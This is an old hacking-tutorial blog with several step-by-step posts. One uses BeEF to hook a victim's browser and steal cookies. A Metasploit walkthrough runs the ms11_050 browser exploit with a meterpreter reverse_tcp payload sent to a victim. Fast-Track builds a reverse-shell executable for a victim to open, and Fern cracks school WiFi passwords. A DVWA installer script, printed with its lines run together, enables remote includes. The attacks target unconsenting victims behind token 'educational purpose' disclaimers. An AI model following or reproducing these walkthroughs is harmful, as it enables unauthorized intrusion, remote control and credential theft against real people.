Tuesday 15 May 2012

Hacking a Web-browser with beef

Browser Explotation Framework is mainly used to exploit a Web-browser.When i was trying it I play a varied types of pranks with victim browser like making open a pop-up window,playing a sound,stealing cookie etc. So lets start hacking.
Follow all the steps according to my post ======>


1. First install beef by clicking on Applications->Backtrack–>Exploitation Tools->Social Engineering Tools->BEEF XSS Framework->BeEF Installer.


2. Now when beef installs open beef by going to same directory like in 1st step then click on beef and beef will start connecting.


3. Now copy the open the url written in front of hook url like in image.


4. After opening the link u will see a login page just put username beef and password beef to login.


5. Now a window will open showing you beef control pannel,now the main explotation will start.


6. Now send this link  http://127.0.0.1:3000/demos/basic.html to victim.




7. Once victim will open you will be contected to his computer through his browser and you will see connected browsers at top left bottom under the Online browser tab like in image.


8. Click on any online browser in online browser tab and you will get a page with a full information of browser.


9. Then click on Commands tab to start open various exploits and tools.


10. Now use any of commands to making pranks with the victim.


Note;---> its for educational purpose only.
While doing all this dont close the terminal that will open as opening of beef.

Friday 11 May 2012

Mega Tutorial : Hacking a remote windows 7 using metasploit

Hey friends I am back with a blasting post on hacking windows.So, I will give you a little introduction about this post. In this post i am gonna hack or control a remote windows 7,xp using metasploit.So let we start hacking.
Follow all steps according to this post ======>
1. Open metasploit in windows or in backtrack.


2. After opening this just type this code  use exploit/windows/browser/ms11_050_mshtml_cobjectelement.


3. Now type set payload windows/meterpreter/reverse_tcp
4. Now type set  lhost  192.168.1.2  in place of 192.168.1.2 type your ip address.
5. Now type set srvhost 192.168.1.2  in place of 192.168.1.2 type your ip address.
6. Now type set uripath adityahackingarticles.
7. Now type exploit.
9. Now a server will be created on ur ip and send the link http://uripaddress/adityahackingarticles send this link to your victim.
10. Now when your victim open ur link he will be hacked and then type sessions -l to start exploiting the victim.
Note : For only Education


Monday 7 May 2012

Installing DAMN Vulnerable app on backtrack


Every one has heard about the DAMN Vulnerable web app. Today i gona tell you about installing it on backtrack. As you all know DAMN vul. app requires xammp,mysql and other softwares but these softwares are pre installed in backtrack.So, do all the steps according to this post:----->
1. Open any text editor .
2. After opening this just paste this code in it =====>
#/bin/bashecho -e "\n#######################################"echo -e "# Damn Vulnerable Web App Installer Script #"echo -e "#######################################"echo " Coded By: Travis Phillips"echo " Website: http://theunl33t.blogspot.com"echo -e -n "\n[*] Changing directory to /var/www..."cd /var/www > /dev/nullecho -e "Done!\n"

echo -n "[*] Removing default index.html..."rm index.html > /dev/nullecho -e "Done!\n"

echo -n "[*] Changing to Temp Directory..."cd /tmpecho -e "Done!\n"

echo "[*] Downloading DVWA..."wget http://voxel.dl.sourceforge.net/project/dvwa/DVWA-1.0.7.zipecho -e "Done!\n"

echo -n "[*] Unzipping DVWA..."unzip DVWA-1.0.7.zip > /dev/nullecho -e "Done!\n"

echo -n "[*] Deleting the zip file..."rm DVWA-1.0.7.zip > /dev/nullecho -e "Done!\n"

echo -n "[*] Copying dvwa to root of Web Directory..."cp -R dvwa/* /var/www > /dev/nullecho -e "Done!\n"

echo -n "[*] Clearing Temp Directory..."rm -R dvwa > /dev/nullecho -e "Done!\n"

echo -n "[*] Enabling Remote include in php.ini..."cp /etc/php5/apache2/php.ini /etc/php5/apache2/php.ini1sed -e 's/allow_url_include = Off/allow_url_include = On/' /etc/php5/apache2/php.ini1 > /etc/php5/apache2/php.inirm /etc/php5/apache2/php.ini1echo -e "Done!\n"

echo -n "[*] Enabling write permissions to /var/www/hackable/upload..."chmod 777 /var/www/hackable/uploads/echo -e "Done!\n"

echo -n "[*] Starting Web Service..."service apache2 start &> /dev/nullecho -e "Done!\n"

echo -n "[*] Starting MySQL..."service mysql start &> /dev/nullecho -e "Done!\n"

echo -n "[*] Updating Config File..."cp /var/www/config/config.inc.php /var/www/config/config.inc.php1sed -e 's/'\'\''/'\''toor'\''/' /var/www/config/config.inc.php1 > /var/www/config/config.inc.phprm /var/www/config/config.inc.php1echo -e "Done!\n"

echo -n "[*] Updating Database..."wget --post-data "create_db=Create / Reset Database" http://127.0.0.1/setup.php &> /dev/nullmysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/gordonb.jpg" where user = "gordonb";'mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/smithy.jpg" where user = "smithy";'mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/admin.jpg" where user = "admin";'mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/pablo.jpg" where user = "pablo";'mysql -u root --password='toor' -e 'update dvwa.users set avatar = "/hackable/users/1337.jpg" where user = "1337";'echo -e "Done!\n"

echo -e -n "[*] Starting Firefox to DVWA\nUserName: admin\nPassword: password"firefox http://127.0.0.1/login.php &> /dev/null &echo -e "\nDone!\n"echo -e "[\033[1;32m*\033[1;37m] DVWA Install Finished!\n"
3. Now save it cybersucks.sh and in root folder.
4. After doing this open terminal amd type this code sh cybersucks.sh and it will start installing DAMN.

Saturday 5 May 2012

Fern Wifi Cracker a GUI Wifi Cracker

Hey friends all of you know about the restrictions on Wifi that is password. In schools and colleges Wifi are protected through password but i have a good hack to crack a Wifi simply in two click. This software is only for linux. Just follow all the steps according to this post:------------------->
1. First download fern wifi cracker from here.
2. Now after downloading put the debian pack to file system.


3. After doing that open terminal and type this code dpkg -i Fern-Wifi-Cracker_1.2_all.deb.


4. Now open fern Wifi cracker from tab others and open this like in image.
5. Now click on Refresh and select an interface and the use any of two options given according to wifi encryption and select and then crack the wifi.
Note-----:> Its for only educational purpose.



Thursday 3 May 2012

Hacking a Computer using fastrack and backtrack

Hey friends i found a latest hack or way to hack into a computer which has a windows operating system.
Ok then lets start.Here are some requirments:-------->
1. Backtrack 
2. Ip address of victim.
3. Brain.
Now follow all the steps according to this post:--------------->
1. Open Fastrack by clicking on Applications-->Backtrack-->Exploitation tools-->Network exploitation tools-->Fast-Track-->fasttrack-interactive.


2. Now after opening fastrack select the option Payload generator by typing 8 and hitting enter.


3. Now after that type 1 to select Windows Shell Reverse_TCP and hit enter.


4. Now after that type 2 to select shikata_ga_nai and hit enter.


5. Now after that enter the ip address of victim and hit enter.
6. Now you have to scan ip address to get open ports refer to this article.


7. If you get any open ports then enter it like in image.
8. After that type 3 to select Executable and hit enter, this option will create a executable file in  directory filesystem-->pentest>exploit-->fasttrack-->payload.exe.
9. Now the send executable file to victim and when the victim open this file you will be connected to computer remotely. 


Note :--- Its for educational purpose

Tuesday 1 May 2012

Hacking For Beginner : A free Ethical Hacking E-Book

Hey Friends i am back with a latest post on ethical hacking. I have an ethical hacking ebook for you. Here are the some details of ebook:------>
Language----> English
Pages--------> 84
Size---------> 11mb

Download here :====>
get here